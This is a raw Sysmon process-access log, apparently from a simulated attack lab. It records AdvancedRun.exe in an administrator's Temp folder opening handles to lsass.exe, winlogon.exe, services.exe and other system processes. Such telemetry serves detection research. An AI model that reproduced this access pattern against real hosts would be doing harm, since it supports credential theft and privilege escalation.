SERVICE 10341000x80000000000000004075284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075283Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075282Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004075281Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004075280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.057{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004075276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.056{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.055{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.054{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 